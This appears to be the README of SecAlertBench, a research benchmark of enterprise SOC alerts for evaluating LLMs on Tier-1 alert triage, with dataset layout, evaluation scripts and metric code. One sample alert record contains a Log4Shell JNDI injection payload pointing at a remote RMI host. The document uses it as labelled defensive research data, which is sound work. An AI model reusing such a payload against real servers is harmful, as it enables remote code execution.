This repository is the Artifact for the paper "SecAlertBench: Evaluating Large Language Models for Tier-1 Alert Triage in Security Operations Centers".
Enterprise security operations centers (SOCs) are heavily affected by alert fatigue, as analysts must triage massive volumes of noisy alerts while identifying the small fraction that truly warrants escalation. Although large language models (LLMs) have shown strong potential in cybersecurity, their capability for Tier-1 alert triage in real-world SOC environments remains unclear. To address this gap, we construct SecAlertBench, a benchmark built from alerts collected from the SOCs of three large enterprises. After standardization and annotation, SecAlertBench contains 8,322 alert logs spanning 241 alert types, with binary labels of Attack and Non-Attack. Using this benchmark, we systematically evaluate 16 LLMs for Tier-1 alert triage. The results show that current LLMs already exhibit promising but limited triage capability, achieving an average TPR of 79.71% and an average F1-score of 70.92%, while still suffering from a high average FPR of 44.13%, indicating a substantial trade-off between attack detection and false-positive control. Beyond aggregate performance, we further conduct multidimensional analyses of LLM behavior, including decision consistency and sensitivity to experimental configurations. Based on these results, we summarize the key limitations and bottlenecks of LLMs in current SOC Tier-1 alert triage. Overall, our findings suggest that LLMs are promising assistants for Tier-1 alert triage, but substantial improvements are still required before they can be reliably deployed as standalone solutions in real-world SOCs.
This repository is organized into four main parts: 0x01 provides representative raw SOC alert examples, 0x02 contains the processed SecAlertBench dataset, 0x03 provides the evaluation scripts, and 0x04 stores the released evaluation results.
SecAlertBench/
├── README.md
├── requirements.txt
├── 0x01. Representative Raw SOC Alert Examples/
│   ├── enterprise_a_examples.json
│   ├── enterprise_b_examples.json
│   └── enterprise_c_examples.json
├── 0x02. Processed SecAlertBench Dataset/
│   ├── secalertbench.json
│   ├── secalertbench_attack.json
│   └── secalertbench_non_attack.json
├── 0x03. Evaluation Scripts/
│   ├── RQ1/
│   ├── RQ2/
│   │   ├── Exp1/
│   │   ├── Exp2/
│   │   └── Exp4/
│   └── RQ3/
└── 0x04. Evaluation Results/
    ├── RQ1/
    ├── RQ2/
    │   ├── Exp1/
    │   ├── Exp2/
    │   ├── Exp3/
    │   └── Exp4/
    └── RQ3/
Our raw alert data was collected from the production SOC environments of three large enterprises. These alerts were generated by network-facing security monitoring and detection systems, including IDS/IPS, WAF, and related traffic inspection platforms.
Due to privacy and compliance considerations, we cannot release the complete raw enterprise alert logs. Instead, we provide several representative raw alert examples from each participating enterprise for reference. The alert examples from the three enterprises are stored separately in 0x01. Representative Raw SOC Alert Examples/.
The processed SecAlertBench dataset is stored in 0x02. Processed SecAlertBench Dataset/secalertbench.json. It contains 8,322 normalized alert records, including 2,496 Attack samples and 5,826 Non-Attack samples. For convenience, we also provide the label-specific splits secalertbench_attack.json and secalertbench_non_attack.json. Each record keeps the core fields required for Tier-1 alert triage, such as alert type, rule name, protocol metadata, source and destination information, request and response content, and the binary Label field. To protect sensitive information, source and destination IP addresses have been replaced with random IP addresses, and timestamp fields have been removed.
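As a quick sanity check, the dataset can be loaded and the label distribution verified with a few lines of Python. This is a minimal sketch that assumes secalertbench.json stores the records as a single UTF-8 JSON array, each record carrying a Label field:

import json
from collections import Counter

# Load the full benchmark (assumed to be one JSON array of alert records).
with open("0x02. Processed SecAlertBench Dataset/secalertbench.json", encoding="utf-8") as f:
    records = json.load(f)

# Count the binary labels; 2,496 Attack and 5,826 Non-Attack samples are expected.
label_counts = Counter(record["Label"] for record in records)
print(f"Total records: {len(records)}")
print(f"Label distribution: {dict(label_counts)}")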
An example record is shown below; note that some field values, such as attack_type (代码执行, "code execution") and rule_name, preserve the original Chinese text produced by the source detection systems:
{
"attack_type": "代码执行",
"dip": "141.137.162.228",
"host": "${jndi:rmi://10.132.233.206:62427/xnSae6Lv}",
"method": "POST",
"rule_name": "Apache Log4j2 远程代码执行漏洞(CVE-2021-44228/CVE-2021-45046)",
"rsp_body": "<html>\r\n<head><title>400 Bad Request</title></head>\r\n<body>\r\n<center><h1>400 Bad Request</h1></center>\r\n<hr><center>nginx</center>\r\n</body>\r\n</html>\r\n",
"kill_chain_all": "入侵:0x02000000|漏洞利用:0x02020000",
"proto": "http",
"xff": "",
"dport": 80,
"rsp_status": 400,
"parameter": "${jndi:rmi://10.132.233.206:62427/xnSae6Lv}",
"sip": "204.215.41.40",
"rsp_header": "HTTP/1.1 400 Bad Request\r\nServer: nginx\r\nDate: Fri, 09 Jan 2026 14:12:27 GMT\r\nContent-Type: text/html\r\nContent-Length: 150\r\nConnection: close\r\n\r\n",
"uri": "/",
"req_header": "POST / HTTP/1.1\r\nConnection: keep-alive\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.12.4\r\nHost: ${jndi:rmi://10.132.233.206:62427/xnSae6Lv}\r\nContent-Length: 43\r\n\r\n",
"req_body": "${jndi:rmi://10.132.233.206:62427/xnSae6Lv}",
"sport": 35090,
"Label": "Attack"
}

The evaluation scripts are stored in 0x03. Evaluation Scripts/. They are organized by research question and provide the code needed to reproduce the experiments on SecAlertBench. The released scripts have been cleaned for artifact use: model names or paths, API endpoints, API keys, dataset paths, output directories, and log directories should be supplied through command-line arguments instead of hard-coded local paths.
RQ1 contains the main Tier-1 alert triage evaluation scripts. run_rq1_api_test_eval.py evaluates API-based LLMs, run_rq1_transformers_test_eval.py evaluates local Hugging Face/Transformers models, and stats_rq1_summary_metrics.py summarizes the resulting TPR, FPR, precision, and F1-score.
For example, the RQ1 API-based evaluation script can be run in a uv environment as follows. Replace the API endpoint, API key, model name, and output paths with your own settings.
cd /path/to/SecAlertBench
uv venv
uv pip install -r requirements.txt
uv run python "0x03. Evaluation Scripts/RQ1/run_rq1_api_test_eval.py" \
--url "https://api.example.com/v1/chat/completions" \
--api-key "YOUR_API_KEY" \
--model "YOUR_MODEL_NAME" \
--attack-data "0x02. Processed SecAlertBench Dataset/secalertbench_attack.json" \
--fp-data "0x02. Processed SecAlertBench Dataset/secalertbench_non_attack.json" \
--sample-per-class 1000 \
--seed 42 \
--threads 40 \
--timeout 60 \
--retry-times 10 \
--out-dir "outputs/rq1_api" \
--log-dir "logs/rq1_api"

RQ2 contains scripts for analyzing model behavior under the paper's experiment organization. Exp1 corresponds to Response Determinism, Exp2 corresponds to Configuration Sensitivity, and Exp4 corresponds to Alert-Type Generalization. Exp3 (Reasoning Correctness) has no separate script directory; its released result files are provided in 0x04. Evaluation Results/.
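For intuition, the decision consistency examined in Exp1 can be thought of as the fraction of alerts for which repeated runs of the same model return an identical verdict. The sketch below only illustrates that idea; it is not the Exp1 script, and the per-run prediction format is assumed:

from typing import Dict, List

def decision_consistency(runs: List[Dict[str, str]]) -> float:
    # `runs` maps alert id -> predicted label ("Attack"/"Non-Attack"),
    # one dictionary per repeated evaluation run of the same model.
    alert_ids = set(runs[0])
    consistent = sum(
        1 for aid in alert_ids
        if len({run[aid] for run in runs}) == 1  # every run agrees on this alert
    )
    return consistent / len(alert_ids)

# Example: three repeated runs over the same two alerts.
runs = [
    {"alert_1": "Attack", "alert_2": "Non-Attack"},
    {"alert_1": "Attack", "alert_2": "Attack"},
    {"alert_1": "Attack", "alert_2": "Non-Attack"},
]
print(decision_consistency(runs))  # 0.5: only alert_1 is labeled consistently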
RQ3 contains scripts for local model latency and GPU-memory profiling. run_rq3_transformers_latency_eval.py supports a single model through --model or --model-path and multiple models through --model-paths; stats_rq3_latency_results.py summarizes latency and resource-usage statistics.
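As a rough illustration of what the RQ3 profiling records, per-sample latency and peak GPU memory for a local model can be measured along the following lines. This is a simplified sketch built on the standard Transformers generate API; the model path, prompt, and generation settings are placeholders rather than the script's actual configuration:

import time
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_path = "/path/to/local/model"  # placeholder checkpoint path
tokenizer = AutoTokenizer.from_pretrained(model_path)
model = AutoModelForCausalLM.from_pretrained(model_path, torch_dtype=torch.float16, device_map="cuda")

prompt = "Classify the following SOC alert as Attack or Non-Attack: ..."  # placeholder prompt
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)

torch.cuda.reset_peak_memory_stats()
start = time.perf_counter()
with torch.no_grad():
    model.generate(**inputs, max_new_tokens=64)
latency_s = time.perf_counter() - start
peak_mem_gib = torch.cuda.max_memory_allocated() / 1024**3

print(f"latency: {latency_s:.2f} s, peak GPU memory: {peak_mem_gib:.2f} GiB")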
The evaluation results are stored in 0x04. Evaluation Results/. This directory contains the released outputs corresponding to the experiments in the paper, including model prediction files, metric summaries, configuration-experiment results, reasoning-judge summaries, and latency profiling records.
RQ1/ stores the main alert-triage prediction results for the evaluated models. Each model has a JSON result file, and these files can be used with the RQ1 statistics script to reproduce the main TPR, FPR, precision, and F1-score summaries.
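For reference, the reported metrics follow their standard definitions with Attack treated as the positive class. A minimal sketch for recomputing them from ground-truth and predicted labels is shown below; how labels are read out of the prediction files is assumed and should be adapted to the released result format:

from typing import List, Tuple

def triage_metrics(y_true: List[str], y_pred: List[str]) -> Tuple[float, float, float, float]:
    # "Attack" is the positive class; "Non-Attack" is the negative class.
    tp = sum(t == "Attack" and p == "Attack" for t, p in zip(y_true, y_pred))
    fp = sum(t == "Non-Attack" and p == "Attack" for t, p in zip(y_true, y_pred))
    fn = sum(t == "Attack" and p == "Non-Attack" for t, p in zip(y_true, y_pred))
    tn = sum(t == "Non-Attack" and p == "Non-Attack" for t, p in zip(y_true, y_pred))
    tpr = tp / (tp + fn) if tp + fn else 0.0        # recall on Attack samples
    fpr = fp / (fp + tn) if fp + tn else 0.0        # false alarms on Non-Attack samples
    precision = tp / (tp + fp) if tp + fp else 0.0
    f1 = 2 * precision * tpr / (precision + tpr) if precision + tpr else 0.0
    return tpr, fpr, precision, f1

print(triage_metrics(["Attack", "Non-Attack", "Attack"], ["Attack", "Attack", "Non-Attack"]))  # (0.5, 1.0, 0.5, 0.5)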
RQ2/ stores behavior-analysis results across four experiment groups that follow the paper terminology. Exp1/ is Response Determinism and contains decision-consistency results under different temperature settings. Exp2/ is Configuration Sensitivity and contains prompting, quantization, and sampling configuration results. Exp3/ is Reasoning Correctness and contains reasoning-judge results with the corresponding summary CSV. Exp4/ is Alert-Type Generalization and contains alert-type-level metric summaries.
RQ3/ stores latency and resource-usage profiling outputs for selected Qwen models under zero-shot, few-shot, and CoT prompting settings. The directory includes per-run JSON summaries, per-sample latency CSV files, and selected Qwen latency summary files.